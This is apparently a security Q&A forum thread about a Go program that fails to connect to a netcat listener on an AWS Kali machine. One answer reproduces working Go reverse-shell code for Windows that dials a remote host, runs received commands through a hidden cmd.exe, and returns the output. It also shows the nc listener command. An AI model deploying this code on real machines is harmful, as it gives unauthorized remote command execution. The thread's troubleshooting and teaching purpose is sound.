# Can't connect to reverse shell – connection waits forever

Tags: kali-linux

I've setup a simple Kali Linux machine on AWS and added a security group where all ports are open, then I executed:

```
nc -vlp 4444
```

Now, in my own personal computer I execute a simple Go program:

```
package main

import (
    "fmt"
    "net"
)

const IP = "MY_PUBLIC_IP:4444"

func main() {
    conn, _ := net.Dial("tcp", IP)
    fmt.Println(conn)
}
```

Nothing really happens, the connection waits until it timeouts. Am I missing some configuration?

Thank you.

Comment: This is not a security question but a networking question. You need to start a troubleshooting process that includes removing your custom code (to eliminate it as a factor) and use nc on your personal computer..

Answer (score 0):

In the following line

```
const IP = "MY_PUBLIC_IP:4444"
```

`MY_PUBLIC_IP`
should be replaced with a real IP address of the target.

Answer (score 0):

You are asking for **reverse shell**, but Your code doesn't have any shell involved in it. Take a look at reverse shell example (Windows) here: [Go reverse shell for Windows](https://gist.github.com/yougg/b47f4910767a74fcfe1077d21568070e).

As You can see in the code here:

```
func reverse(host string) {
c, err := net.Dial("tcp", host)
if nil != err {
    if nil != c {
        c.Close()
    }
    time.Sleep(time.Minute)
    reverse(host)
}

r := bufio.NewReader(c)
for {
    order, err := r.ReadString('\n')
    if nil != err {
        c.Close()
        reverse(host)
        return
    }

    cmd := exec.Command("cmd", "/C", order)
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    out, _ := cmd.CombinedOutput()

    c.Write(out)
}
```

}

Once **net.Dial** established connection, it waits for the input, and uses **cmd.exe /C** to execute given command, reads the output and send it back to some listener (nc in Your case).

**TL;DR:**
You miss the **shell** part in Your code